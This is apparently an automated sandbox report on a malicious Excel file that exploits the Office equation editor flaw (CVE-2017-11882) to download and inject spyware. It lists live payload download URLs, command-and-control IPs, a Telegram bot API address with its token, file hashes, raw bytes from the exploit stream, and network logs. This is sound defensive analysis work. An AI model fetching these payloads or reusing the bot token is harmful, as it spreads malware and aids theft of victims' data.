                Command and Control: Encrypted Channel (11); Ingress Tool Transfer (13); Non-Application Layer Protocol (2); Application Layer Protocol (23); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
                Behavior Graph (the graph image is not reproduced here; the node data it carried is listed below)

                Behavior Graph ID: 679189
                Sample: Contract - Wipak Oy.xlsx
                Startdate: 05/08/2022
                Architecture: WINDOWS
                Score: 100
                Top-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 11 other signatures

                Process tree:
                • EXCEL.EXE (started)
                  • dropped: C:\Users\user\...\~$Contract - Wipak Oy.xlsx (data)
                • EQNEDT32.EXE (started)
                  • network: pkusukoharjo.com 136.243.86.20, port 443, local port 49171, HETZNER-ASDE, Germany
                  • dropped: jhghyftvgyjhjhgjhj...gfrtreaebvcnbnc.exe (PE32); C:\Users\user\AppData\Local\...\qGTGx[1].exe (PE32)
                  • signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  • jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe (started)
                    • network: cdn.discordapp.com 162.159.129.233, port 443, local port 49172, CLOUDFLARENETUS, United States; 109.206.241.81, port 80, local port 49173, AWMLTNL, Germany
                    • signatures: Machine Learning detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                    • powershell_ise.exe (started)
                      • dw20.exe (started)

                Initial sample
                Source | Detection | Scanner | Label
                Contract - Wipak Oy.xlsx | 53% | Virustotal |
                Contract - Wipak Oy.xlsx | 41% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
                Contract - Wipak Oy.xlsx | 100% | Avira | EXP/CVE-2017-11882.Gen
                Contract - Wipak Oy.xlsx | 100% | Joe Sandbox ML |

                Dropped files
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe | 100% | Joe Sandbox ML |

                Unpacked PE files
                Source | Detection | Scanner | Label
                6.0.powershell_ise.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.ff0000.1.unpack | 100% | Avira | HEUR/AGEN.1202427

                Domains
                Source | Detection | Scanner | Label
                pkusukoharjo.com | 0% | Virustotal |

                URLs
                Source | Detection | Scanner | Label
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                https://pkusukoharjo.com/y | 0% | Avira URL Cloud | safe
                http://109.206.241.81/htdocs/zTALg.exe | 19% | Virustotal |
                http://109.206.241.81/htdocs/zTALg.exe | 100% | Avira URL Cloud | malware
                http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                https://pkusukoharjo.com/giving/qGTGx.exej | 0% | Avira URL Cloud | safe
                https://pkusukoharjo.com/giving/qGTGx.exe | 0% | Avira URL Cloud | safe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                https://pkusukoharjo.com/ | 0% | Avira URL Cloud | safe
                http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                https://pkusukoharjo.com/giving/qGTGx.exejjC: | 0% | Avira URL Cloud | safe
                http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                http://109.206.241.81P | 0% | Avira URL Cloud | safe
                Contacted domains
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                cdn.discordapp.com | 162.159.129.233 | true | false | | high
                pkusukoharjo.com | 136.243.86.20 | true | true | | unknown

                Contacted URLs
                Name | Malicious | Antivirus Detection | Reputation
                http://109.206.241.81/htdocs/zTALg.exe | true | 19% Virustotal; Avira URL Cloud: malware | unknown
                https://pkusukoharjo.com/giving/qGTGx.exe | true | Avira URL Cloud: safe | unknown
                https://cdn.discordapp.com/attachments/1001850193580392480/1002961152617222144/seven.dll | false | | high

                URLs from memory and binaries
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://pkusukoharjo.com/y | EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://pkusukoharjo.com/giving/qGTGx.exejdbSYXB9S.Pu6cL | | false | Avira URL Cloud: safe | unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://pkusukoharjo.com/ | EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/ | jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                https://pkusukoharjo.com/giving/qGTGx.exejjC: | EQNEDT32.EXE, 00000002.00000002.996175505.000000000056F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://cdn.discordapp.com | jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://109.206.241.81P | jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1007008986.0000000002443000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.129.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
136.243.86.20 | pkusukoharjo.com | Germany | 24940 | HETZNER-ASDE | true
109.206.241.81 | unknown | Germany | 209929 | AWMLTNL | false
                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:679189
Start date and time: 2022-08-05 11:39:58 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 8m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Contract - Wipak Oy.xlsx
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:9
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSX@8/6@2/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 63
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .xlsx
                                • Adjust boot time
                                • Enable AMSI
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.89.179.12, 104.208.16.93
                                • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, legacywatson.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:41:53 | API Interceptor | 134x Sleep call for process: EQNEDT32.EXE modified
11:42:01 | API Interceptor | 49x Sleep call for process: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe modified
11:42:07 | API Interceptor | 85x Sleep call for process: powershell_ise.exe modified
11:42:07 | API Interceptor | 105x Sleep call for process: dw20.exe modified
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):8704
                                Entropy (8bit):4.812551859843081
                                Encrypted:false
                                SSDEEP:96:5PM1Y6CB0C0st2AbUCAb17mF3lIpDXHo2rbwCiCeQhULtgAwsMIkGTp9rQEkrGi4:SAT0st2MUQIN42rSCekUL+VtvC
                                MD5:6D370555D43F89189867FD72222C6059
                                SHA1:79505977A7B45050A45BC4B715B21DF8F49AA3F1
                                SHA-256:41BF0E9B141CB3541CE14CA9DE7F606FD30C20E02CE95936F41FB728BD6C2232
                                SHA-512:48A97F522BD2DDD2704093917B4E19DC48726F650FD0DB496EE6D6BEE7CDD87CE089ADC8076EF1BD8D1401B100D81A50D2025AF8C061955DD740BA01056AC5EC
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                IE Cache URL:https://pkusukoharjo.com/giving/qGTGx.exe
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 410 x 243, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):8217
                                Entropy (8bit):7.81503617702935
                                Encrypted:false
                                SSDEEP:192:kls9+/gQllKX6BrlzeHQbj4D24m1hcfxCEKSPALL78koM:kls9+NllKX6BhSH0j4Dxm1CfEEKSPA/T
                                MD5:A9CA5EE503B10E01BE979F0843A1F65F
                                SHA1:52E1FFFBDA428BD216AE62586E39AC1C20FC25C5
                                SHA-256:653F8662E65E224B05605B256BB4F6DE5F29F2B155DC4477635B8E43024503E4
                                SHA-512:07C64C4AFF76AEF6A76491184E1823C2FD2CBD1536C3D771B14CC887B7853074F6AC93EDBB1C58F38893B95D03FF2E17E30E66FF9F3334441788728EA1F8272F
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.6399755325948338
                                Encrypted:false
                                SSDEEP:96:6BCfkZJGUWs+xLuK5QXIW2zgBmBPUPZApIvY8rHvMpEWi7uyPV6VcRF9xdc79M8w:6kfv4gz5iyXg9uQxlAdWdSIy
                                MD5:17415515AD0E30C922DD9F6DEE28CF59
                                SHA1:C7F953A80317699B00D7072E9C5973D7BD7A6199
                                SHA-256:8F9E3D9197B50DFAE8987F1ED7D2EDECAF2D284B5A3A5F646E861EB3ADEF4272
                                SHA-512:D91195B73ED8667F3AB6DD3D40F1CD1C4772E7022CDEB9F5C5A471EB3212A2C227DD907FC3082E9CD4DE55943DEF520A448285957BEA20E4BE3D92FD5C3C08BC
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2628
                                Entropy (8bit):3.6609345877607806
                                Encrypted:false
                                SSDEEP:48:yeRipPp6uhzrkG/wU6Gww7VxpAFgYkbkiQG5zO8ewLK/KDtHw+PjsMS+Mb6x24SQ:Shz4tU6o7VxBt33Ob83jt3
                                MD5:6B0C7E04A7A8FC222E8CDBAE62FC4423
                                SHA1:E2127ABC15302B905312214B336FC528AB27A722
                                SHA-256:65E62AD5061F3D8AF644696AAE22C80F608357A3CBB303D3EF0AE5C376E408E3
                                SHA-512:F1BC810A00F079F86DB82E72E0724CC54B1C024785C884937B86209898952BCBA705D8DA6B07701F9C7CCCD0FE30D1BC3E0506321036DDAE1CC14C5F46E7EB6F
                                Malicious:false
                                Reputation:low
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):8704
                                Entropy (8bit):4.812551859843081
                                Encrypted:false
                                SSDEEP:96:5PM1Y6CB0C0st2AbUCAb17mF3lIpDXHo2rbwCiCeQhULtgAwsMIkGTp9rQEkrGi4:SAT0st2MUQIN42rSCekUL+VtvC
                                MD5:6D370555D43F89189867FD72222C6059
                                SHA1:79505977A7B45050A45BC4B715B21DF8F49AA3F1
                                SHA-256:41BF0E9B141CB3541CE14CA9DE7F606FD30C20E02CE95936F41FB728BD6C2232
                                SHA-512:48A97F522BD2DDD2704093917B4E19DC48726F650FD0DB496EE6D6BEE7CDD87CE089ADC8076EF1BD8D1401B100D81A50D2025AF8C061955DD740BA01056AC5EC
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:true
                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                File type:Microsoft Excel 2007+
                                Entropy (8bit):7.99738280724659
                                TrID:
                                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                • ZIP compressed archive (8000/1) 16.67%
                                File name:Contract - Wipak Oy.xlsx
                                File size:2819080
                                MD5:d0cd467a481799f5dc06a498e24ff4ad
                                SHA1:da919b490b8192eab7c577b4a85337d09eb56a9e
                                SHA256:831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c
                                SHA512:deefc6c8b76de5f8cd1ed1f7541d136961d6f249a16abc4c6cac7114ac55facc3c0d3f5c5b581dabd18bb71468351bb28039d2ff533aaa634240e8587f0ac545
                                SSDEEP:49152:4yFhEeXk7Vs4O7VhPiiw176tK5fpiB+VkAT5H0T9DpZvlfp+INtJz:4uXmijhhPDwNgiBiBuTG1lx+IN3
                                TLSH:DCD53396C4F0AB688E9F1585EEAF7840472FBAC1E1DF8496D054047C37AB19DF222D4E
                                File Content Preview:PK........"J.U................[Content_Types].xmlUT......b...b...b.U[k.0.~/.?...XI.e.q.[.....B.(K'....N.....nZ(.Yp./.-...O.....b.1i.*6*...'..nQ.....WV$.N...Tl...L....... .K.[".o.'..+R..8...h..g\. .J,._..W\z..p...M..0.k.....['.-X.../KUL....|2~ .Q+(."./ai.o
                                Icon Hash:e4e2aa8aa4b4bcb4
                                Document Type:OpenXML
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:False
                                Author:Marcus Egharevba
                                Last Saved By:Marcus Egharevba
                                Create Time:2022-07-26T22:32:06Z
                                Last Saved Time:2022-07-27T02:01:40Z
                                Creating Application:Microsoft Excel
                                Security:0
                                Thumbnail Scaling Desired:false
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:12.0000
                                General
                                Stream Path:\x1oLE10nATivE
                                File Type:data
                                Stream Size:3008016
                                Entropy:7.830311072494768
                                Base64 Encoded:True
                                Data ASCII:_ . . . l . . . M & n 5 . + . . 1 . 5 ] . . V . . - ` B . . . ` h . X . c e s $ o A u 2 V % _ 5 3 Z ( . , p y K * . Y { . v . , 6 T 7 < Y k . . t o ` \\ . . z S , ( ^ x N b R t . 5 2 f t . $ = J + b I d u = ] U . . g = 7 . . ^ G . . * . 7 e F . . . L k - - . i . 2 N . Y . . ) x _ < . 4 W I s H E , / = h . . w i g . j . c C ^ . . d . : e 6 & l . $ y . / . . . x c . c ' . 5 W { . - ; U 5 % . 5 9 . J e 6 . . . j . 5 . m . . ( _ F E . D W R 7 8 i . l 4 \\ Q ^ . l Y . w ^ S m @ O . , z Q C . N N o . . . ] . +
                                Data Raw:8e 5f d9 05 02 80 16 6c 0c 9b 01 08 4d ed b8 ff 26 6e c4 35 c3 9b 2b c4 8b 08 8b 31 bb e5 fb a3 19 81 eb 35 94 5d 19 8b 1b 56 ff d3 05 f8 81 0a c3 2d c5 f7 e9 c2 ff e0 fe bd 88 60 42 00 19 1e 60 c5 d8 68 14 58 17 85 63 b3 a7 80 d3 f3 ca 65 e9 d3 73 f9 24 6f 41 75 32 56 25 5f e5 35 f5 94 a6 84 33 5a a0 28 04 2c d1 70 79 a3 4b 2a ab 9b 1f ef 59 f5 7b cf 04 a8 e0 76 aa fd d6 81 2c 8b
                                General
                                Stream Path:vd4Gf9eRaIg9JoI2jb8EGtk
                                File Type:empty
                                Stream Size:0
                                Entropy:0.0
                                Base64 Encoded:False
                                Data ASCII:
                                Data Raw:
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Aug 5, 2022 11:41:36.367290020 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.367333889 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395163059 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395216942 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395246029 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395271063 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395301104 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395324945 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395359993 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395385981 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395405054 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395423889 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395442009 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395461082 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395473003 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395478010 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395498037 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395515919 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395520926 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395538092 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395545959 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395572901 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395596027 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395622969 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395625114 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395647049 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395665884 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395684958 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395694971 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395703077 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395720959 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395731926 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395740032 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395765066 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395791054 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395806074 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395814896 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395843029 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395868063 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395889997 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395893097 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395915985 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395919085 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395940065 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395956993 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395960093 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.395967007 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395992994 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.395993948 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396017075 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396044016 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396064043 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396080017 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396083117 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396101952 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396121025 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396137953 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396146059 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396167994 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396172047 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396188021 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396207094 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396207094 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396225929 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396226883 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.396245003 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396262884 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.396270990 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.399621010 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:36.423975945 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.424014091 CEST8049173109.206.241.81192.168.2.22
                                Aug 5, 2022 11:41:36.424268961 CEST4917380192.168.2.22109.206.241.81
                                Aug 5, 2022 11:41:40.198798895 CEST4917380192.168.2.22109.206.241.81
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 5, 2022 11:41:32.226768017 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Aug 5, 2022 11:41:32.245600939 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Aug 5, 2022 11:41:35.477466106 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Aug 5, 2022 11:41:35.498608112 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 5, 2022 11:41:32.226768017 CEST | 192.168.2.22 | 8.8.8.8 | 0x4e86 | Standard query (0) | pkusukoharjo.com | A (IP address) | IN (0x0001)
Aug 5, 2022 11:41:35.477466106 CEST | 192.168.2.22 | 8.8.8.8 | 0xdd2e | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 5, 2022 11:41:32.245600939 CEST | 8.8.8.8 | 192.168.2.22 | 0x4e86 | No error (0) | pkusukoharjo.com |  | 136.243.86.20 | A (IP address) | IN (0x0001)
Aug 5, 2022 11:41:35.498608112 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd2e | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)
